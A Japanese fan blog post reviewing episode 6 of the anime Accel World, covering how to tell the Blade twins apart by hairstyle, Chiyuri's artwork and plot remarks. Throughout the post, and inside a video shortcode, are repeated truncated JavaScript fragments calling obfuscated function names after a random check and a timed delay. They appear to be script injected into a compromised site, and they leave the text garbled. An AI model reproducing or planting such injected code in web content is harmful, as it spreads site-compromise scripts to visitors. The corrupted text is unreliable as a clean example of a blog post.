【アニメ紹介】アクセル・ワールド #6「Retribution;応報」

[nicolink vidom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}deoid=”so17792794″]

ネタバレあり

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

原作的に見分け方は、ツインテールとポニーテールです。

マンガン・ブレードが、ポニーテール。(髪飾りが1本)

コバルト・ブレードが、ツインテール。(髪飾りが2本)

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

ぷーって感じで不機嫌になってるの可愛いよね。

しかし、髪型を褒めるというのは難しい。

髪型変えたとか言っても、変えてないしとかいわれるし・・・

ハルユキの気持ちがよくわかってしまう。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

チユリの作画が毎回気合入っているように思えるのは気のせいだろうか。

今週も可愛いぞ。ぷんぷん。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

まさかの登場。

原作最新刊の話がきましたね。

時系列的には正しいけど、いいのかな。

原作の流れだとまだ心意とか、そういったものもないので、記憶操作とかがでてくると、どんな世界なんだ?

とアニメだけ見ている人が今來するかも?

いや、もともとなんでもありそうな世界だから気にしないかもしれないかな。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

ニコニコ動画のコメントの

鳳凰院凶真だ!!

とか、かっこいいポーズとかついてて、うけてしまった。

そういえば、たしかにそうだ。

基本、みんな厨二だからね。

さてさて、次回も楽しめそうだ。

コメントを残す